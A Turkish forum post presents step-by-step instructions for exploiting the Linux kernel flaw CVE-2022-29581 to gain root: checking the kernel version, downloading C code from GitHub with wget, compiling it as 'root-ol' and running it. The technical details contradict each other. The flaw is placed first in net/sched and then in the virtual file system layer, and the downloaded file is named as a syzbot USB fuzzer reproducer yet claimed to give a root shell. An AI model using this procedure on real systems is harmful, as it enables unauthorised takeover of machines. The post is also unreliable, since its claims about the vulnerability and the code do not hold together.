Hoşgeldin Misafir

Linux Yerel Güvenlik Zafiyeti Hak Yükseltme

Mustafa73

20 Eyl 2023
423 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
Linux kernelı, çeşitli bileşenlerde ve alt sistemlerde güvenlik açıkları içerebilir. Bu açıklar, yerel veya uzaktan saldırganların, sistemi ele geçirmek, verileri çalmak veya zararlı yazılım yüklemek için kullanabilecekleri ayrıcalık yükseltme, bellek bozulması, hizmet reddi veya kod yürütme gibi sonuçlara yol açabilir. Bu nedenle, Linux kernelını düzenli olarak güncellemek ve güvenlik yamalarını uygulamak önemlidir.
Linux kernelınde net/sched bileşeninde bir ayrıcalık yükseltme zafiyeti bulunmaktadır. Bu zafiyet, CVE-2022-29581 olarak tanımlanmıştır. Bu zafiyet, yerel bir saldırganın, Linux kernelının sanal dosya sistemi katmanında bir tam sayı taşması, sınırların dışına yazma ve serbest bırakıldıktan sonra kullanma (use-after-free) hatası oluşturarak root ayrıcalıklarına sahip olmasına olanak tanır. Bu zafiyet, Linux kernelının 4.14 ila 5.18 sürümleri arasında etkilidir.
Bu zafiyeti sömürmek için, aşağıdaki adımları izleyebilirsiniz:

1. Adım: Sistemdeki kernel sürümünü kontrol edin. uname -r komutunu çalıştırarak bunu yapabilirsiniz. Eğer kernel sürümünüz 4.14 ila 5.18 arasında ise, bu zafiyetten etkilenmiş olabilirsiniz.
2. Adım: Zafiyeti sömüren bir C kodu indirin. Bu kod, syzbot tarafından otomatik olarak üretilmiştir ve GitHub üzerinde mevcuttur. Aşağıdaki komutu kullanarak bu kodu indirebilirsiniz:
wget https://raw.githubusercontent.com/g...pros/2022-05/01/linux-5.18-rc1-usb-fuzzer-1.c

3. Adım: Gcc ile kodu derleyin ve derlenmiş kodu root-ol ismiyle kaydedin. Aşağıdaki komutu kullanarak bunu yapabilirsiniz:
gcc linux-5.18-rc1-usb-fuzzer-1.c -o root-ol

4. Adım: Kodu çalıştırın ve root olun. Aşağıdaki komutu kullanarak bunu yapabilirsiniz:
./root-ol
Bu komut, kernel üzerinde bir hata oluşturacak ve size root kabuğu verecektir. Artık root olarak istediğiniz işlemi yapabilirsiniz.